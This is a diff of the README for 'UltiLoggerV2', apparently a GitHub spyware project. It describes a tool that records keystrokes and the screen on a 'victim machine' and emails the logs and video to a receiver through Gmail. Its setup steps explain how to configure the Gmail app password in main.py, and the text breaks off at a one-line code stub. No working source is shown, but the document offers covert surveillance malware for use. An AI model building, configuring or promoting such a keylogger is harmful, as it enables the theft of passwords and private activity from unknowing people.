Kammelleon/UltiLoggerV2/README.md

 # UltiLoggerV2

-This is second version of previous UltiLogger repo: https://github.com/Kammelleon/UltiLogger
+This is second version of previous UltiLogger repo: https://github.com/Kammelleon/UltiLogger.
+The previous version is deprecated as it uses the feature called by Google "less secure apps".

+# How it works
+1. Capture key presses into .txt file located on victim machine
+2. Capture screen recording to .avi file in the same time as logs
+3. Send email to receiver with logs (.txt) and corresponding screen recording film (.avi)

+Program works in infinite loop controlled by timeouts for some actions

 # Preparation

 This app was tested only on Windows 10.
 In order to use this you should have a Gmail account and 2FA enabled on it.
-Next, you need to generate app password (as Google disabled less secure apps).
+Next, you will need to generate an app password (as Google disabled less secure apps).
-You can do it here: https://myaccount.google.com/apppasswords After that you can provide your app password inside main.py:
+You can do it here: https://myaccount.google.com/apppasswords After that you can provide the app password inside main.py:

 ```python
 gmail = Gmail(app_password=YOUR_APP_PASSWORD,...